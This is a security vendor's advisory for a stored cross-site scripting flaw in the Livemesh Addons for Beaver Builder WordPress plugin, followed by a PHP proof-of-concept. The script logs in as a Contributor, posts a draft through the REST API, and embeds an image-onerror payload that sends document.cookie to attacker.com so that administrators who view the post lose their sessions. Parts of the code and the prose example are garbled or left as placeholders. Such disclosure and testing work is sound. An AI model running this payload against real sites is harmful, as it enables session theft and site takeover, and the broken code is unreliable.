Atomic Edge analysis of CVE-2026-2029 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Livemesh Addons for Beaver Builder WordPress plugin, affecting versions up to and including 3.9.2. The vulnerability resides in the `[labb_pricing_item]` shortcode’s `title` and `value` attributes. Attackers with Contributor-level or higher privileges can inject malicious scripts that execute when a user views a compromised page. The CVSS 3.1 score of 6.4 (Medium) reflects its network accessibility, low attack complexity, and requirement for low-privilege authentication, with scope change and impacts on confidentiality and integrity.
Atomic Edge research identifies the root cause as a flawed sanitization sequence. The description explicitly states the plugin uses `htmlspecialchars_decode()` after `wp_kses_post()`. The `wp_kses_post()` function sanitizes content by removing disallowed HTML, but `htmlspecialchars_decode()` subsequently decodes any HTML entities (like `<` back to `<`) that may have been part of the sanitized output or user input. This sequence flaw effectively re-activates any script payloads that were encoded but not removed by the initial sanitization. This conclusion is directly inferred from the vulnerability description, not from code review.
Exploitation requires an authenticated user with at least Contributor-level permissions. The attacker would create or edit a post or page using the WordPress editor. They would embed the vulnerable `[labb_pricing_item]` shortcode with malicious JavaScript payloads within its `title` or `value` attributes. For example: `[labb_pricing_item title="Plan 
” value=”$10″]`. Upon saving the post, the payload is stored in the database. The payload executes in the browsers of any user (including administrators) who views the published page where the shortcode renders.
Effective remediation requires correcting the sanitization and escaping logic. The fix must ensure proper output escaping occurs after any necessary decoding, or it must remove the `htmlspecialchars_decode()` call if it serves no legitimate purpose in this context. Proper context-aware escaping functions like `esc_attr()` for HTML attributes should be applied to the shortcode attribute values before they are output in the frontend HTML. The patched version should validate and sanitize user input upon receipt and escape it upon output.
Successful exploitation leads to stored cross-site scripting. Injected scripts execute within the victim’s browser session under the security context of the vulnerable site. This allows attackers to steal session cookies, perform actions on behalf of the victim (like creating new administrator accounts), deface websites, or redirect users to malicious sites. The impact is elevated because Contributor-level users, who typically cannot publish posts, can still create posts for review. An administrator reviewing such a post could trigger the XSS payload, potentially leading to full site compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2029 - Livemesh Addons for Beaver Builder <= 3.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' and 'value' Shortcode Attributes
<?php
/*
* Proof of Concept for CVE-2026-2029.
* This script simulates an authenticated Contributor-level user injecting a stored XSS payload
* via the vulnerable [labb_pricing_item] shortcode in a WordPress post.
* Assumptions:
* 1. The target site has the Livemesh Addons for Beaver Builder plugin (<= v3.9.2) installed.
* 2. Valid Contributor-level credentials are available ($username, $password).
* 3. The site uses standard WordPress REST API and admin-ajax endpoints.
* 4. The attacker aims to inject a script that exfiltrates admin session cookies.
*/
$target_url = 'https://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_password'; // CONFIGURE THIS
// Payload: Basic cookie exfiltration via image tag onerror handler.
// The payload is placed inside the 'title' attribute of the shortcode.
// htmlspecialchars_decode() will decode the HTML entities after wp_kses_post sanitization.
$xss_payload = '<img src=x onerror=javascript:fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))>';
// The payload is HTML-entity encoded to simulate typical input handling.
$encoded_payload = htmlspecialchars($xss_payload, ENT_QUOTES);
// Construct the shortcode with the malicious payload.
$shortcode = '[labb_pricing_item title="' . $encoded_payload . '" value="$10"]';
$post_title = 'Test Post with XSS - ' . date('Y-m-d H:i:s');
$post_content = 'This post contains a malicious pricing item shortcode.nn' . $shortcode . 'nnEnd of content.';
// Step 1: Authenticate and obtain a nonce for REST API requests.
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEJAR => '/tmp/cookies.txt', // Store session cookies
CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
]);
$response = curl_exec($ch);
// Step 2: Fetch a REST API nonce for post creation.
// Contributor users typically use the REST API via wp-admin.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => 'rest-nonce'
]));
$response = curl_exec($ch);
// In a real scenario, parse the nonce from admin page HTML or REST API response.
// For this PoC, we assume a nonce is obtained. Actual implementation would require page scraping.
$nonce = 'REST_NONCE_PLACEHOLDER'; // This would be extracted dynamically.
// Step 3: Create a new post via WordPress REST API using the authenticated session.
// Contributor posts are saved as 'draft'.
$rest_url = $target_url . '/wp-json/wp/v2/posts';
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
'title' => $post_title,
'content' => $post_content,
'status' => 'draft'
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-WP-Nonce: ' . $nonce // Nonce is required for REST API requests.
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code >= 200 && $http_code < 300) {
$response_data = json_decode($response, true);
$post_id = $response_data['id'] ?? 0;
echo "[+] Post created successfully (ID: $post_id).n";
echo "[+] Shortcode injected: $shortcoden";
echo "[+] When an administrator views this draft post, the XSS payload will execute.n";
echo "[+] Payload attempts to exfiltrate cookies to attacker.com.n";
} else {
echo "[-] Failed to create post. HTTP Code: $http_coden";
echo "[-] Response: $responsen";
}
curl_close($ch);
?>
